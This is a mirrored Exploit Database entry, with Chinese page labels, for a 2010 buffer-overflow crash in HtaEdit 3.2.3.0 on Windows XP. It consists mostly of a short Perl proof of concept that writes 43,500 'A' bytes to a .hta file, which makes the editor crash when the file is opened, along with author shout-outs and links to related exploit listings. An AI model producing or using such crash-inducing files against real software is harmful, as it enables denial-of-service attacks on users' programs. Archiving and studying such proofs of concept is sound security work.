HtaEdit 3.2.3.0 – ‘.hta’ Buffer Overflow

Exploit Database
18 阅读

作者： anT!-Tr0J4n

日期： 2010-11-04
类别：
- dos
平台：
- windows
来源：https://www.exploit-db.com/exploits/15411/

#Title: HtaEdit v 3.2.3.0 (.hta) Buffer Overflow Vulnerability

#Author: anT!-Tr0J4n

#Email: D3v-PoinT[at]hotmail[d0t]com & C1EH[at]Hotmail[d0t]com

#Greetz: Dev-PoinT.com ; GlaDiatOr,SILVER STAR , HoBeeZ, Coffin Of Evil

#special thanks: r0073r,Sid3^effects,L0rd CruSad3r,SeeMe,Sonic,gunslinger_,Sn!pEr.S!Te,n4pst3rr,indoushka, KnocKout,SONiC,ZoRLu

#Home : www.Dev-PoinT.com ; $ http://inj3ct0r.com

#Software :http://www.htaedit.com/

#Tested on: Windows XP sp3

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=


#!/usr/bin/perl
print " Author: anT!-Tr0J4n\n";
print " Greetz :http://inj3ct0r.com; \n";
print "Home : www.Dev-PoinT.com ; \n";

my $junk= "\x41" x 43500 ;
open(file,">crash.hta");
print file $junk ;
close(file);

last Exploits
HtaEdit 3.2.3.0 – ‘.hta’ Buffer Overflow的更多信息

Oracle DataDirect ODBC Drivers – HOST Attribute ‘arsqls24.dll’ Stack Buffer Overflow (PoC)：
SpotDialup 1.6.7 – ‘Name’ Denial of Service (PoC)：
Apache 1.4/2.2.x – APR ‘apr_fnmatch()’ Denial of Service：
Invision Power Board – Denial of Service：
Free IP Switcher 3.1 – ‘Computer Name’ Denial of Service (PoC)：
WebKit JSC – ‘JSArray::shiftCountWithArrayStorage’ Out-of-Bounds Read/Write：
Google Android – WifiNative::setHotlist Stack Overflow：
Calavera UpLoader 3.5 – ‘FTP Logi’ Denial of Service (PoC + SEH Overwrite)：